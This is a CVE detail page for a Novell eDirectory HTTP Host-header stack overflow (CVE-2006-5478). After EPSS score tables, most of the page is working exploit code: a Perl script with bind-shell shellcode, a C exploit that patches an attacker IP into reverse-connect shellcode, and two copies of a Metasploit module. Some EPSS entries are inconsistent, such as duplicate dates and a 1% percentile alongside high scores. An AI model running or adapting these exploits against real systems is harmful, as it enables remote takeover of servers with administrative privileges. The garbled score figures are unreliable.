CVE-2006-5478 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	83.61%	–	–
2023-03-12	–	–	–	95.86%	–
2023-04-02	–	–	–	95.9%	–
2023-07-23	–	–	–	95.83%	–
2023-09-03	–	–	–	95.39%	–
2023-11-12	–	–	–	95.58%	–
2024-06-02	–	–	–	95.58%	–
2024-12-22	–	–	–	91.32%	–
2025-02-16	–	–	–	92.29%	–
2025-01-19	–	–	–	91.32%	–
2025-02-16	–	–	–	92.29%	–
2025-03-18	–	–	–	–	89.66%
2025-03-30	–	–	–	–	88.82%
2025-03-30	–	–	–	–	88.82,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	1%
2023-03-12	99%
2023-04-02	99%
2023-07-23	99%
2023-09-03	99%
2023-11-12	99%
2024-06-02	99%
2024-12-22	99%
2025-02-16	99%
2025-01-19	99%
2025-02-16	99%
2025-03-18	1%
2025-03-30	99%
2025-03-30	99%

source: https://www.securityfocus.com/bid/20655/info The Novell eDirectory server iMonitor is prone to a stack-based buffer-overflow vulnerability because it fails to perform sufficient bounds checking on client-supplied data before copying it to a buffer. An attacker could leverage this issue to execute arbitrary code with administrative privileges. A successful exploit could result in the complete compromise of the affected system. #!perl # # "Novell eDirectory 8.8 NDS Server" Remote Stack Overflow Exploit # # Author: Manuel Santamarina Suarez # e-Mail: FistFuXXer@gmx.de # use IO::Socket; # # destination IP address # $ip = '192.168.1.25'; # # destination TCP port # $port = 8028; # # RETurn address. 0x00, 0x0a, 0x0d, 0x3a free # $ret = reverse( "\x5F\x83\x3B\x7A" ); # CALL ESP # MFC42U.5f833b7a # # 0x00, 0x0a, 0x0d, 0x3a free shellcode # # win32_bind - EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com # $sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e". "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x38". "\x4e\x56\x46\x42\x46\x32\x4b\x58\x45\x44\x4e\x43\x4b\x48\x4e\x57". "\x45\x30\x4a\x37\x41\x50\x4f\x4e\x4b\x38\x4f\x44\x4a\x51\x4b\x48". "\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x43\x4b\x38". "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x38\x42\x4c". "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e". "\x46\x4f\x4b\x53\x46\x55\x46\x42\x4a\x42\x45\x57\x45\x4e\x4b\x48". "\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x54". "\x4b\x58\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x38". "\x49\x38\x4e\x46\x46\x42\x4e\x41\x41\x46\x43\x4c\x41\x53\x4b\x4d". "\x46\x36\x4b\x58\x43\x44\x42\x33\x4b\x48\x42\x44\x4e\x50\x4b\x58". "\x42\x47\x4e\x51\x4d\x4a\x4b\x58\x42\x54\x4a\x50\x50\x45\x4a\x36". "\x50\x38\x50\x54\x50\x50\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x46". "\x43\x35\x48\x56\x4a\x56\x43\x33\x44\x53\x4a\x46\x47\x57\x43\x47". "\x44\x53\x4f\x55\x46\x35\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e". "\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e". "\x48\x56\x41\x48\x4d\x4e\x4a\x50\x44\x50\x45\x35\x4c\x46\x44\x30". "\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45". "\x4f\x4f\x48\x4d\x43\x35\x43\x35\x43\x35\x43\x35\x43\x35\x43\x54". "\x43\x45\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x46\x4a\x46\x41\x31". "\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x4a\x36\x46\x4a". "\x4c\x41\x42\x37\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x41". "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x42". "\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x45\x45\x35\x4f\x4f\x42\x4d". "\x4a\x46\x45\x4e\x49\x34\x48\x38\x49\x54\x47\x35\x4f\x4f\x48\x4d". "\x42\x55\x46\x55\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x36". "\x47\x4e\x49\x37\x48\x4c\x49\x57\x47\x55\x4f\x4f\x48\x4d\x45\x45". "\x4f\x4f\x42\x4d\x48\x36\x4c\x36\x46\x56\x48\x46\x4a\x56\x43\x36". "\x4d\x46\x49\x38\x45\x4e\x4c\x56\x42\x45\x49\x35\x49\x32\x4e\x4c". "\x49\x58\x47\x4e\x4c\x56\x46\x44\x49\x48\x44\x4e\x41\x53\x42\x4c". "\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x52\x50\x4f\x44\x54\x4e\x52". "\x43\x59\x4d\x48\x4c\x37\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36". "\x44\x47\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x44\x4f\x4f". "\x48\x4d\x4b\x55\x47\x55\x44\x35\x41\x55\x41\x35\x41\x55\x4c\x46". "\x41\x50\x41\x45\x41\x55\x45\x45\x41\x35\x4f\x4f\x42\x4d\x4a\x46". "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x55\x4f\x4f\x48\x4d\x4c\x56". "\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x38\x47\x45\x4e\x4f". "\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d". "\x4a\x36\x50\x57\x4a\x4d\x44\x4e\x43\x37\x43\x45\x4f\x4f\x48\x4d". "\x4f\x4f\x42\x4d\x5a"; print '"Novell eDirectory 8.8 NDS Server" Remote Stack Overflow Exploit'."\n\n"; $sock = IO::Socket::INET->new ( PeerAddr => $ip, PeerPort => $port, Proto => 'tcp', Timeout => 2 ) or print '[-] Error: Could not establish a connection to the server!' and exit(1); print "[+] Connected.\n"; print "[+] Trying to overwrite RETurn address...\n"; $sock->send( "GET /nds HTTP/1.1\r\n" ); $sock->send( 'Host: ' . 'SEXY' x 17 . $ret . $sc . "\r\n\r\n" ); print "[+] Done. Now check for bind shell on $ip:4444!"; close( $sock );

// source: https://www.securityfocus.com/bid/20655/info The Novell eDirectory server iMonitor is prone to a stack-based buffer-overflow vulnerability because it fails to perform sufficient bounds checking on client-supplied data before copying it to a buffer. An attacker could leverage this issue to execute arbitrary code with administrative privileges. A successful exploit could result in the complete compromise of the affected system. /* _______ ________ .__ _____ __ ___ __\ _ \ ____ \_____ \ | |__ / | | ____ | | __ \ \/ / /_\ \ / \ _(__ < ______ | | \ / | |__/ ___\| |/ / > <\ \_/ \ | \/ \ /_____/ | Y \/ ^ /\ \___| < /__/\_ \\_____ /___| /______ / |___| /\____ | \___ >__|_ \ \/ \/ \/ \/ 30\10\06 \/ |__| \/ \/ * mm. dM8 * YMMMb. dMM8 _____________________________________ * YMMMMb dMMM' [ ] * `YMMMb dMMMP [ There are doors I have yet to open ] * `YMMM MMM' [ windows I have yet to look through ] * "MbdMP [ Going forward may not be the answer ] * .dMMMMMM.P [ ] * dMM MMMMMM [ maybe I should go back ] * 8MMMMMMMMMMI [_____________________________________] * YMMMMMMMMM www.netbunny.org * "MMMMMMP * MxM .mmm * W"W """ [i] Title: Novell eDirectory <= 9.0 DHost Buffer overflow exploit [i] Discovered by: Novell [i] Original code by: FistFuXXer [i] Exploit by: Expanders [i] Filename: XHNB-Novell-eDirectory_remote_bof.c [i] References: http://www.novell.com/ [i] Greatings: x0n3-h4ck - netbunny [ Research diary ] After a try of FistFuXXer's perl exploit I started to port the code in C and also use a different exploiting method. This exploit overwrite the Second Exception Handler to take control of the program flow. [ Special thanks ] FistFuXXer H D Moore [ Links ] www.x0n3-h4ck.org www.netbunny.org */ #include <stdio.h> #include <sys/socket.h> #include <sys/types.h> #include <sys/stat.h> #include <netinet/in.h> #include <netdb.h> #include <unistd.h> #define BUFFSIZE 1000 // Buffer size #define DEADRET "\xde\xc0\xad\xde" // this address cause the exception to be called int banner(); int usage(char *filename); int inject(char *port, char *ip); int remote_connect( char* ip, unsigned short port ); char attack[] = "GET /nds HTTP/1.1\r\n" "Host: %s\r\n\r\n"; /* win32_reverse - EXITFUNC=seh Size=312 Encoder=Pex http://metasploit.com */ char shellcode[] = "\x29\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3f" "\x61\x88\x6f\x83\xeb\xfc\xe2\xf4\xc3\x0b\x63\x22\xd7\x98\x77\x90" "\xc0\x01\x03\x03\x1b\x45\x03\x2a\x03\xea\xf4\x6a\x47\x60\x67\xe4" "\x70\x79\x03\x30\x1f\x60\x63\x26\xb4\x55\x03\x6e\xd1\x50\x48\xf6" "\x93\xe5\x48\x1b\x38\xa0\x42\x62\x3e\xa3\x63\x9b\x04\x35\xac\x47" "\x4a\x84\x03\x30\x1b\x60\x63\x09\xb4\x6d\xc3\xe4\x60\x7d\x89\x84" "\x3c\x4d\x03\xe6\x53\x45\x94\x0e\xfc\x50\x53\x0b\xb4\x22\xb8\xe4" "\x7f\x6d\x03\x1f\x23\xcc\x03\x2f\x37\x3f\xe0\xe1\x71\x6f\x64\x3f" "\xc0\xb7\xee\x3c\x59\x09\xbb\x5d\x57\x16\xfb\x5d\x60\x35\x77\xbf" "\x57\xaa\x65\x93\x04\x31\x77\xb9\x60\xe8\x6d\x09\xbe\x8c\x80\x6d" "\x6a\x0b\x8a\x90\xef\x09\x51\x66\xca\xcc\xdf\x90\xe9\x32\xdb\x3c" "\x6c\x22\xdb\x2c\x6c\x9e\x58\x07\x35\x61\x88\x6c\x59\x09\x8c\x69" "\x59\x32\x01\x8e\xaa\x09\x64\x96\x95\x01\xdf\x90\xe9\x0b\x98\x3e" "\x6a\x9e\x58\x09\x55\x05\xee\x07\x5c\x0c\xe2\x3f\x66\x48\x44\xe6" "\xd8\x0b\xcc\xe6\xdd\x50\x48\x9c\x95\xf4\x01\x92\xc1\x23\xa5\x91" "\x7d\x4d\x05\x15\x07\xca\x23\xc4\x57\x13\x76\xdc\x29\x9e\xfd\x47" "\xc0\xb7\xd3\x38\x6d\x30\xd9\x3e\x55\x60\xd9\x3e\x6a\x30\x77\xbf" "\x57\xcc\x51\x6a\xf1\x32\x77\xb9\x55\x9e\x77\x58\xc0\xb1\xe0\x88" "\x46\xa7\xf1\x90\x4a\x65\x77\xb9\xc0\x16\x74\x90\xef\x09\x78\xe5" "\x3b\x3e\xdb\x90\xe9\x9e\x58\x6f"; char jmpback[]= //22 byte xor decoder (0x55) "\xEB\x0F\x5B\x33\xC9\x66\x83\xE9\xE0\x80\x33\x55\x43\xE2\xFA\xEB\x05\xE8\xEC\xFF\xFF\xFF" //(20 byte jump-back code -> 256 + 256 + 64 bytes) "\x8C\xBB\x8C\x21\x71\xA1\x0C\xD5\x94\x5F\xC5\xAB\x98\xAB\x98\xD5\xBC\x15\xAA\xB4"; char jmpover[]= // 2 bytes jump 6 bytes over - 2 bytes NOP "\xEb\x06\x90\x90"; struct retcodes{char *platform;unsigned long addr;} targets[]= { { "eDirectory MFC42U.dll", 0x5f80bbf7 }, { "Windows NT SP 5/6" , 0x776a1082 }, // ws2help.dll pop esi, pop ebx, retn [Tnx to metasploit] { "Windows 2k Universal" , 0x750211a9 }, // ws2help.dll pop ebp, pop ebx, retn [Tnx to metasploit] { "Windows XP Universal" , 0x71abe325 }, // ws2help.dll pop ebx, pop ebp, retn [Tnx to metasploit] { NULL } }; int banner() { printf("\n _______ ________ .__ _____ __ \n"); printf("___ __\\ _ \\ ____ \\_____ \\ | |__ / | | ____ | | __ \n"); printf("\\ \\/ / /_\\ \\ / \\ _(__ < ______ | | \\ / | |__/ ___\\| |/ / \n"); printf(" > <\\ \\_/ \\ | \\/ \\ /_____/ | Y \\/ ^ /\\ \\___| < \n"); printf("/__/\\_ \\\\_____ /___| /______ / |___| /\\____ | \\___ >__|_ \\ \n"); printf(" \\/ \\/ \\/ \\/ \\/ |__| \\/ \\/ \n\n"); printf("[i] Title: \tNovell eDirectory DHost Buffer overflow\n"); printf("[i] Perl Code by:\tFistFuXXer\n"); printf("[i] Exploit by: \tExpanders\n\n"); return 0; } int usage(char *filename) { int i; printf("Usage: \t%s <host> <port> <l_ip> <l_port> <targ>\n\n",filename); printf(" \t<host> : Victim's host\n"); printf(" \t<port> : Victim's port :: Default: 8028\n"); printf(" \t<l_ip> : Local ip address for connectback\n"); printf(" \t<l_port> : Local port for connectback\n"); printf(" \t<targ> : Target from the list below\n\n"); printf("# \t Platform\n"); printf("-----------------------------------------------\n"); for(i = 0; targets[i].platform; i++) printf("%d \t %s\n",i,targets[i].platform); printf("-----------------------------------------------\n"); exit(0); } int inject(char *port, char *ip) { unsigned long xorip; unsigned short xorport; xorip = inet_addr(ip)^(unsigned long)0x6F88613F; xorport = htons(atoi( port ))^(unsigned short)0x6F88; memcpy ( &shellcode[184], &xorip, 4); memcpy ( &shellcode[190], &xorport, 2); return 0; } int remote_connect( char* ip, unsigned short port ) { int s; struct sockaddr_in remote_addr; struct hostent* host_addr; memset ( &remote_addr, 0x0, sizeof ( remote_addr ) ); if ( ( host_addr = gethostbyname ( ip ) ) == NULL ) { printf ( "[X] Cannot resolve \"%s\"\n", ip ); exit ( 1 ); } remote_addr.sin_family = AF_INET; remote_addr.sin_port = htons ( port ); remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr ); if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 ) { printf ( "[X] Socket failed!\n" ); exit ( 1 ); } if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 ) { printf ( "[X] Failed connecting!\n" ); exit ( 1 ); } return ( s ); } int main(int argc, char *argv[]) { int s,position; unsigned int rcv; char *buffer,*request; char recvbuf[256]; banner(); if( (argc != 6) || (atoi(argv[2]) < 1) || (atoi(argv[2]) > 65534) ) usage(argv[0]); position = 0; printf("[+] Creating evil buffer\n"); buffer = (char *) malloc(BUFFSIZE); request = (char *) malloc(BUFFSIZE + strlen(attack)); // +3 == \r + \n + 0x00 memset(buffer,0x90,BUFFSIZE); // Fill with nops inject(argv[4],argv[3]); // Xor port and ip and put them into the shellcode memset(buffer,0x41,68); // First comes the ascii position = 68; memcpy(buffer+position,DEADRET,4); position = 680 - (strlen(shellcode) + 100); // 680 : Pointer to next Execption structure memcpy(buffer+position,shellcode,strlen(shellcode)); position += strlen(shellcode)+100; memcpy(buffer+position,jmpover,4); position += 4; memcpy(buffer+position,&targets[atoi(argv[5])].addr,4); position += 4; position += 8; // 8 bytes more nops memcpy(buffer+position,jmpback,strlen(jmpback)); position += strlen(jmpback); position += 8; // 8 bytes more nops memset(buffer+position,0x00,1); // End sprintf(request,attack,buffer); printf("[+] Connecting to remote host\n"); s = remote_connect(argv[1],atoi(argv[2])); sleep(1); printf("[+] Sending %d bytes of painfull buffer\n",strlen(buffer)); if ( send ( s, request, strlen (request), 0) <= 0 ) { printf("[X] Failed to send buffer\n"); exit ( 1 ); } printf("[+] Done - Wait for shell on port %s\n",argv[4]); close(s); free(buffer); buffer = NULL; return 0; }

source: https://www.securityfocus.com/bid/20655/info The Novell eDirectory server iMonitor is prone to a stack-based buffer-overflow vulnerability because it fails to perform sufficient bounds checking on client-supplied data before copying it to a buffer. An attacker could leverage this issue to execute arbitrary code with administrative privileges. A successful exploit could result in the complete compromise of the affected system. ## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'Novell eDirectory NDS Server Host Header Overflow', 'Description' => %q{ This module exploits a stack overflow in Novell eDirectory 8.8.1. The web interface does not validate the length of the HTTP Host header prior to using the value of that header in an HTTP redirect. }, 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-5478'], ['OSVDB', '29993'], ['BID', '20655'], ], 'DefaultOptions' => { 'EXITFUNC' => 'seh', }, 'Payload' => { 'Space' => 600, 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c", 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", }, 'Platform' => 'win', 'Targets' => [ [ 'Novell eDirectory 8.8.1', { 'Ret' => 0x10085bee } ], # ntls.dll ], 'Privileged' => true, 'DisclosureDate' => 'Oct 21 2006', 'DefaultTarget' => 0)) register_options([Opt::RPORT(8028)], self.class) end def exploit connect sploit = "GET /nds HTTP/1.1" + "\r\n" sploit << "Host: " + rand_text_alphanumeric(9, payload_badchars) sploit << "," + rand_text_alphanumeric(719, payload_badchars) seh = generate_seh_payload(target.ret) sploit[705, seh.length] = seh sploit << "\r\n\r\n" print_status("Trying target #{target.name}...") sock.put(sploit) handler disconnect end end

## # $Id: edirectory_host.rb 9262 2010-05-09 17:45:00Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'Novell eDirectory NDS Server Host Header Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Novell eDirectory 8.8.1. The web interface does not validate the length of the HTTP Host header prior to using the value of that header in an HTTP redirect. }, 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision: 9262 $', 'References' => [ ['CVE', '2006-5478'], ['OSVDB', '29993'], ['BID', '20655'], ], 'DefaultOptions' => { 'EXITFUNC' => 'seh', }, 'Payload' => { 'Space' => 600, 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c", 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", }, 'Platform' => 'win', 'Targets' => [ [ 'Novell eDirectory 8.8.1', { 'Ret' => 0x10085bee } ], # ntls.dll ], 'Privileged' => true, 'DisclosureDate' => 'Oct 21 2006', 'DefaultTarget' => 0)) register_options([Opt::RPORT(8028)], self.class) end def exploit connect sploit = "GET /nds HTTP/1.1" + "\r\n" sploit << "Host: " + rand_text_alphanumeric(9, payload_badchars) sploit << "," + rand_text_alphanumeric(719, payload_badchars) seh = generate_seh_payload(target.ret) sploit[705, seh.length] = seh sploit << "\r\n\r\n" print_status("Trying target #{target.name}...") sock.put(sploit) handler disconnect end end